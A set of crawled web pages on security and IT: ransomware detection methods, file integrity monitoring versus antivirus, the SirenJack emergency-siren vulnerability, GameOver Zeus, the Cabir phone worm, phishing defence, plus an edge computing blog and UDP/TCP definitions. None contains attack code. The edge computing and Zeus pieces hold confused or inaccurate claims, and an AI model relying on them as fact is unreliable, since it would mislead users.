detection compares ransomware binary hashes to known malware signatures. This enables fast, static analysis of files in the environment. Security platforms and antivirus software capture data from executables to determine whether they are ransomware or approved executables. Most modern antivirus solutions have this capability – when they scan the local environment for malware, they can detect known ransomware variants. Signature-based ransomware detection technology is a first line of defense. It helps detect known threats, but it is largely unable to identify new ransomware strains. In addition, attackers update and permutate malware files to avoid detection. Even adding just one byte to a file creates a new hash and reduces the likelihood of malware detection. Still, signature-based detection helps identify outdated ransomware samples and known good files (for example, common business applications), ruling out the possibility that they are malware. It can protect against ordinary ransomware campaigns, but not sophisticated, targeted ransomware campaigns. Data traffic analysis is another detection method that looks at data processed by and transferred to or from a device, inspecting elements like timestamps and data volumes for anomalies. If the algorithm detects unusual data patterns that indicate a possible ransomware attack, the file system is locked down. The advantage of this approach over signature-based solutions is that it is highly effective at stopping ransomware attacks, and can detect modified ransomware attacks without knowing their malware signature. The main disadvantage of this approach is the high rate of false positives. In many cases, protective software can block legitimate files or data operations, resulting in costly downtime and hurting productivity. Data behavior monitoring is a technique that monitors file execution to identify anomalies. Behavior-based solutions monitor the behavior of files and processes in the operating system for malicious activity such as encryption or overwriting of DLL files. Unlike the signature-based and data traffic-based methods, this method does not require a signature and has a lower rate of false positives. Also, it does not need to lock down the entire file system – instead, it can block individual processes that exhibit suspicious behavior. The downside of this approach is that it can take the system time to analyze process behavior before it can detect ransomware activity. This means that in many cases, some data will be encrypted before the algorithm responds. A dedicated security tool can provide holistic protection against ransomware, both at the network, file system, and application layer. One such solution is Cynet 360, an advanced threat detection and response platform that provides protection against threats, including ransomware, zero-day attacks, advanced persistent threats (APT), and trojans that can evade signature-based security measures. Cynet provides a multi-layered approach to stop ransomware from executing and encrypting your data: Learn more about how Cynet 360 can protect your organization against ransomware and other advanced threats.
<urn:uuid:54d1f64f-bcbb-41fa-8c9d-518eb1a7a5be>
CC-MAIN-2022-40
https://www.cynet.com/ransomware/ransomware-detection-common-signs-and-3-detection-techniques/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00253.warc.gz
en
0.913202
997
3.546875
4
Is a gun better than a knife? I've been trying hard for an analogy, but this one kind of works. Which is better? A gun or a knife? Both will help defend you against an attacker. A gun may be better than a knife if you are under attack from a big group of attackers running at you, but without ammunition, you are left defenseless. The knife works without ammunition and always provides a consistent deterrent, so in some respects, gives better protection than a gun. Which is not a bad way to try and introduce the concept of FIM versus Anti-Virus technology. Anti-Virus technology will automatically eliminate malware from a computer, usually before it has done any damage. Both at the point at which malware is introduced to a computer, through email, download or USB and at the instant at which a malware file is accessed, the AV will scan for known malware. If identified as a known virus, or even if the file exhibits characteristics that are associated with malware, the infected files can be removed from the computer. However, if the AV system doesn't have a definition for the malware at hand, then like a gun with an empty magazine, it can't do anything to help. File Integrity Monitoring, by contrast, may not be quite so 'active' in wiping out known malware, but - like a knife - it never needs ammo to maintain its role as a defense against malware. A FIM system will always report potentially unsafe filesystem activity, albeit with intelligence and rules to ignore certain activities that are always defined safe, regular or normal. AV and FIM versus the Zero Day Threat The key points to note from the previous description of AV operation is that the virus must either be 'known' i.e. the virus has been identified and categorized by the AV vendor or that the malware must 'exhibit characteristics associated with malware' i.e. it looks, feels and acts like a virus. Anti-virus technology works on the principle that it has a regularly updated 'signature' or 'definition' list containing details of known malware. Any time a new file is introduced to the computer, the AV system has a look at the file and if it matches anything on its list, the file gets quarantined. In other words, if a brand new, never-been-seen-before virus or Trojan is introduced to your computer, it is far from guaranteed that your AV system will do anything to stop it. Ask yourself - if AV technology was perfect, why would anybody still be concerned about malware? The lifecycle of malware can be anything from 1 day to 2 years. The malware must first be seen - usually, a victim will notice symptoms of the infection and investigate before reporting it to their AV vendor. At that point, the AV vendor will work out how to counteract the malware in the future and update their AV system definitions/signature files with details of this new malware strain. Finally, the definition update is made available to the world, individual servers and workstations around the world will update themselves and will thereafter be rendered immune to this virus. Even if this process takes a day to conclude then that is a pretty good turnaround - after just one day the world is safe from the threat. However, up until this time, the malware is a problem. Hence the term 'Zero Day Threat' - the dangerous time is between 'Day Zero' and whichever day the inoculating definition update is provided. By contrast, a FIM system will detect the unusual filesystem activity - either at the point at which the malware is introduced or when the malware becomes active, creating files or changing server settings to allow it to report back the stolen data. Where is FIM better than AV? As outlined previously, FIM needs no signatures or definitions to try and second guess whether a file is malware or not and it is, therefore, less fallible than AV. Where FIM provides some distinct advantage over and above AV is in that it offers far better preventative measures than AV. Anti-Virus systems are based on a reactive model, a 'try and stop the threat once the malware has hit the server' approach to defense. An Enterprise FIM system will not only keep watch over the core system and program files of the server, watching for malware introductions but will also audit all the server's built-in defense mechanisms. The process of hardening a server is still the number one means of providing a secure computing environment and prevention, as we all know, is better than cure. Why try and hope your AV software will identify and quarantine threats when you can render your server fundamentally secure via a hardened configuration? Add to this that Enterprise FIM can be used to harden and protect all components of your IT Estate, including Windows, Linux, Solaris, Oracle, SQL Server, Firewalls, Routers, Workstations, POS systems etc. etc. etc. and you are now looking at an absolutely essential IT Security defense system. This article was never going to be about whether you should implement FIM or AV protection for your systems. Of course, you need both, plus some good firewalling, IDS and IPS defenses, all wrapped up with solid best practices in Change and Configuration Management, all scrutinized for compliance via comprehensive audit trails and procedural guidelines. Unfortunately, there is no real 'making do' or cutting corners when it comes to IT Security. Trying to compromise on one component or another is a false economy and every single security standard and best practice guide in the world agrees on this. FIM, AV, auditing and change management should be mandatory components in your security defenses.
<urn:uuid:77b43f46-5c46-4016-8cd2-ca76515cde49>
CC-MAIN-2022-40
https://www.newnettechnologies.com/is-fim-better-than-av.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00253.warc.gz
en
0.936512
1,165
2.59375
3
Edge Computing Use Cases: Edge computing has a new paradigm for deploying web applications outside of the Cloud. The Edge is the place where web users and their personal devices connect to the public cloud. It’s defined by its proximity to end-users. In this sense, it’s a browser-based platform, much more so than the Cloud, but still more fully distributed This kind of platform doesn’t have any one unified way of operating. Rather, it’s composed of different layers – an interface, a server, and a collection of browser plug-ins and utilities. Once you deploy an Edge-based application, all your computers to communicate with the edge-computing “warehouse”. Each device has its own virtual private cloud environment. This enables you to use a browser on any number of these devices without needing to be anywhere else. You may be familiar with some of the benefits of using the browser virtual desktop model. To take full advantage of this architecture, however, you will need an Internet provider with which to connect. This is a very different experience from connecting to a local data center. A large corporation could provide all Edge computing devices and data centers. However, in a smaller business, that may not be possible. If you use an ISP that provides cloud services, you can access any device – even if you aren’t located in the same physical area as the edge-computing “cloud”. One of the primary use cases for Edge computing is in the area of telecommuting. Instead of having to wait on your ISP to deliver your work or communicate with your co-workers in real-time, you can submit your information to the Edge cloud and receive it immediately. This is known as instantaneously publishing.” This type of service is best provided by broadband with low latency. In other words, if you have a low-latency connection, then you will be able to use Edge. Another use case for Edge computing is in the area of virtualization. Virtualization enables you to create partitions between two different types of devices – one hosted on the internet and one on a remote server. One benefit of using an Edge computing platform is that it allows you to run different operating systems on the same hardware. Therefore, if you are running Windows OS in your office, and want to use Linux in your laptops, then you can simply boot your virtual machines off of the internet (on a virtual server) and access them via a VPN connection. A third popular use case is in the area of software development. With applications written to run on the Edge through the browser, you no longer need to use software that has been installed on your computer. With this type of service, a developer creates and deploys his or her application without actually having to install any hardware, or deal with drivers or downloads. Thus, it is beneficial in the area of reducing development costs, as well as simplifying communications between team members. While all three of these use cases make use of an Edge computing device, there are still some differences between them that are worth noting. First, there is no need to have a laptop, for one. Second, while the IoT software runs on the web browser itself, so it is not necessary to have internet access. Lastly, while most IoT applications are browser-based, they are not all rendered in the manner that you would expect when viewing a web page on a computer. Some images are only partially displayed, and some do not respond as they should in real-world situations. But, most use cases for internet-based Edge computing are quite straightforward, as most people understand how to use the browser. The future of Edge computing looks strong. As companies such as Apple, Google, Amazon, and others to integrate more closely with their respective cloud services, we will see more closely-real-time interactions within the office or at home. We may even see Edge support added to smartphones, which will allow consumers to access websites that are off-the-shelf and ready to go in real-time. Regardless of whether or not we see the ‘end’ of Edge, it does look as if we will, for the time being, move our conversations away from desktops, and towards the ever-popular cloud. - Mobodexter, Inc., based in Redmond- WA, builds internet of things solutions for enterprise applications with Highly scalable Kubernetes Edge Clusters that works seamlessly with AWS IoT, Azure IoT & Google Cloud IoT. - Want to build your Edge Computer Vision solution – Email us at [email protected] - Check our Edge Marketplace for our Edge Innovation. - Join our newly launched marketing partner affiliate program to earn a commission here. - We publish weekly blogs on IoT & Edge Computing: Read all our blogs or subscribe to get our blogs in your Emails.
<urn:uuid:c343b5ef-d54b-44b4-8b0f-8d27d8cb136c>
CC-MAIN-2022-40
https://blogs.mobodexter.com/edge-computing-use-cases/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00453.warc.gz
en
0.936232
1,000
3.203125
3
The sound of an emergency alert siren can be a nightmare soundtrack to the millions who live in areas subject to hurricanes, tornados, earthquakes, or other natural disasters. A recently disclosed vulnerability in the emergency warning system used by San Francisco and other municipalities could allow a threat actor to take control of the system, sound false alarms, or block legitimate warnings. While the vendor - ATI - says it has now patched the so-called SirenJack vulnerability, an unencrypted protocol, the process of its discovery could have implications for other locations. Balint Seeber, a researcher with Bastille, began researching San Francisco's warning siren system shortly after moving to the city in 2016. Noticing poles with sirens attached scattered throughout the city, and noting that the hardware for the sirens included radio antennae, Seeber was curious about the system's security. After realizing that there was a system test every Tuesday, Seeber first began looking for the system's radio frequency. "I started every week, capturing and analyzing large chunks of the radio spectrum with a view to trying to find this one unknown signal amongst hundreds, maybe thousands, of signals across the spectrum and that took some time," he says. Seeber was surprised to find that the frequency used by the system is not one normally associated with public service or public infrastructure control. It is, instead, one that is close to those used by radio amateurs. "I've demonstrated that even a $30 to $35 handheld radio you can buy from Amazon that is used by radio hobbyists — like a more enhanced walkie-talkie — is perfectly capable of perpetuating an attack when combined with a laptop," he says. Once the frequency was known he began looking at the transmission itself and he soon found that the control signals were being sent with no encryption at all. That meant that anyone willing to put in the sort of effort he had made could analyze and hijack control of the system. Seeber then traveled to Sedgwick County, Kansas, where a similar system was in use, to see if the vulnerability also existed there. "The findings were consistent there and I did see the same pattern. And so I was able to confirm that their system was also vulnerable," he says. While each system is customized to a great extent, Seeber says that an attacker could use their knowledge of the protocol to turn pre-programmed alerts on or off. In addition, he says that the system has a direct public-address mode, so it is possible that an attacker could use the infrastructure to broadcast an illicit message to the public over these public speakers. At that point, Seeber and Bastille notified ATI, the system's vendor, of the SirenJack vuln. Seeber is eager to point out that the notification was in line with ethical analyst behavior. "We conducted this process with responsible disclosure," he says, adding, "That means that we write our findings up and and disclose it privately to the vendor, which we did in early January. Then we provide 90 days during which they're able to take those findings and prepare any remediation steps." In a statement, ATI's CEO, Dr. Ray Bassiouni, said, "ATI is fully supportive of all of our clients and will be on standby if anyone is concerned about hacking or vulnerabilities in their system." Seeber says that while Bastille was not asked to test the patch ATI provided to San Francisco, he has seen work on the pole-based components and has noticed random traffic within the signals, traffic that indicates at least some level of encryption is now in place. "We don't want the public to lose confidence in the system and the government's ability to handle emergencies," Seeber says. He encourages more government agencies to test their emergency notification systems to avoid surprises in the future. - US Election Swing States Score Low Marks in Cybersecurity - Privacy: Do We Need a National Data Breach Disclosure Law? - Electric Utility Hit with Record Fine for Vulnerabilities - Incident 'Management': What IT Security Can Learn from Public Safety Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here.Register with Promo Code DR200 and save $200.
<urn:uuid:b71c3103-364f-425e-8546-13a490b48b8e>
CC-MAIN-2022-40
https://www.darkreading.com/iot/-sirenjack-vulnerability-lets-hackers-hijack-emergency-warning-system
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00453.warc.gz
en
0.968936
886
2.578125
3
User Datagram Protocol (UDP) is an alternative communications protocol to Transmission Control Protocol (TCP), used primarily for starting low-latency and loss-tolerating connections between applications and the internet. UDP is also known as a “stateless” protocol, meaning it doesn’t acknowledge that the packets being sent have been received. Due to UDP working this way, it is typically used for streaming services. You may hear some break up in the audio or see some skips in the video, but UDP transmissions prevents the stream from stopping completely. Transmission Control Protocol (TCP) is a standard that defines how to establish and maintain a network conversation through which programs can exchange information or data. TCP works with the Internet Protocol (IP), which defines how computers send packets of information to each other. TCP is widely used for its reliability, ordered nature, and error correction. TCP is used for a variety of things, like email, file transfers, and any other operations where error-free data is more important than pure speed.
<urn:uuid:e90006e0-3524-48dc-a3d1-021beeaf86d3>
CC-MAIN-2022-40
https://cyberhoot.com/cybrary/user-datagram-protocol-udp/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00453.warc.gz
en
0.945838
216
3.875
4
Starting of June this year was the end of the most sophisticated malware named “Gameover, Gameover Zeus or GOZ” that infected million of machines with a Malware that encrypts the files on the system and demands a ransom to decrypt that, the team behind this malware earned more than $100 Millions through encrypting and decrypting files of innocent users’. BUT, According to news from various sources online, the malware seen online again, an email demo was showed by Sophos Lab about, how the spammy mail looks like, that include the code similar to Gameover Botnet and infecting users from a new type of spam emails campaign: What is a Botnet? Botnet said to be very effective than any other hacking techniques, as it works automatically and don’t need any authentication or presence of attacker every time—if once installed. You can say these are types of zombies, because it affects one system to another—then another one to some another one, and the chain continues till the GameOver. What a Botnet can do for hackers? If a Botnet installed on your system, then it will infect other computers in your network or you connect online to other systems via chat, email or any other services. Hackers can also send commands to botnet infected computers at the same time to do as they want, botnet infected systems also can be used to launch a DDoS Attack, clicking on ads to generate revenue for hackers, and of course encrypt your complete system too. The above attacks from Botnet infected computers are hard to stop, as the innocent user don’t know about any malicious activity going on from his/her system. Gameover has scrambled most of its text messages (strings, in programming parlance) using a custom algorithm that has been the same since the source code to the original Zeus was leaked in 2011, Sophos writes. This algorithm and the string table is still present in this new version and we can see that the decrypted strings are the same as those in earlier Gameover variants, it added. A complete report on the latest re-Gameover Malware published on Sophos Blog HERE. One thing you must do to secure your systems, always keep an Antivirus Program running on your system and stay safe and connected to us :)
<urn:uuid:84f2aaac-de8c-439a-8486-bf5b4477c9f0>
CC-MAIN-2022-40
http://www.hackersnewsbulletin.com/2014/07/gameover-zeus-sophisticated-malware-re-invented.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00453.warc.gz
en
0.938652
480
2.515625
3
The Cabir mobile phone virus has been spotted on a Nokia handset for sale in a shop in California, reported Finnish anti-virus research company F-Secure. Cabir is a worm that runs in Symbian OS handsets and replicates itself over Bluetooth connections. Infected phones display the message ´Caribe´ when turned on, and the worm then looks for other Bluetooth connected handsets nearby that will allow it to spread. Its payload causes phone batteries to drain. Since it was created in Philippines in August 2004, Cabir has “mutated” to produce 15 variations and spread into 12 countries through travelers´ infected handsets. Rapidly developing technology makes cell phone viruses a fast-growing threat, warned IBM in its recent research. It is now becoming essential for all Symbian users get anti-virus protection for their mobile – the sooner the better.
<urn:uuid:962460f8-84b0-4fd6-9e24-8a2396b2baaa>
CC-MAIN-2022-40
https://it-observer.com/cell-phones-us-are-not-cabir-immune.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00453.warc.gz
en
0.944756
182
2.515625
3
Protecting Your Users from Phishers This post is the first in a series on how to protect your users from common online security threats.Phishing is the act of tricking a user into providing sensitive information (username and password, social security number, confidential files, etc.) Hackers recently used phishing attacks (among other techniques) to steal vast quantities of credit card information from Home Depot and Target, while the Anti-Phishing Work Group detected over 250,000 phishing sites in Q1 and Q2 2014 alone.A classic phishing attack might go something like this: - A hacker sends a user an email purporting to be from your company’s IT department - The email indicates that a security breach has occurred and provides a link to where the user can reset his/her password. - The user enters his/her account credentials in a Web form made to resemble a page in your corporate Intranet. - The hacker uses these credentials to access your system. Phishing schemes have become very sophisticated; hackers will go to great lengths to create emails and websites that are nearly exact replicas of your company’s emails and website. Often, the only distinguishing tells are bogus URLs. Social media has made the phisher’s job easier by allowing the collection of personal information, which can be included in phishing communication to build trust. For example, a San Francisco-based employee who posts a series of pictures of Seattle on Instagram could be targeted with a message that includes a line about “your recent conference in Seattle.” Social media also makes it easier to identify targets who might have access to sensitive data.The best way to avoid a phishing attack is to train your employees to be suspicious of any official-looking communication that prompts them to enter sensitive information, like account credentials. Blurry corporate logos, misspelled words, and weirdly-phrased language are all clues that an email or website is a phishing artifice. In particular, users should pay close attention to hyperlinks in seemingly-official emails. Common signs of a sketchy URL include misspelled words and URLs that do not begin with “https://”.Contacting the authority requesting sensitive information is a good practice, but is not foolproof. Phishers are often savvy social engineers who are adept at manipulating the trust of your users. They have been known to field calls from numbers on their fake websites and persuade their victims to divulge information over the phone.Two-Step Login Verification (also known as Two-Factor or Multi-Factor Authentication) is the best technical tool to defeat phishers. TSLV requires users to enter a third piece of information (in addition to username and password) to access their accounts. For example, a user might enter his/her username and password, and then be prompted to enter a one-time code sent to his/her mobile phone as a text. The idea here is that even if hackers phish the user’s username and password, they are unlikely to also have gained control of the user’s mobile phone.Egnyte has partnered with Duo Security to offer a robust Two-Step Login Verification system, which you can make mandatory for your account users. This feature is included in our Advanced Security Package. Interested in learning more? Here are some additional details on advanced authentication. Get started with Egnyte today Explore the best secure platform for business-critical content across clouds, apps, and devices. LATEST PRODUCT ARTICLES Don’t miss an update Subscribe today to our newsletter to get all the updates right in your inbox.
<urn:uuid:a0d35ba3-81cb-4672-941c-3d73875fe1a5>
CC-MAIN-2022-40
https://www.egnyte.com/blog/post/protecting-your-users-from-phishers
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00453.warc.gz
en
0.928327
771
2.796875
3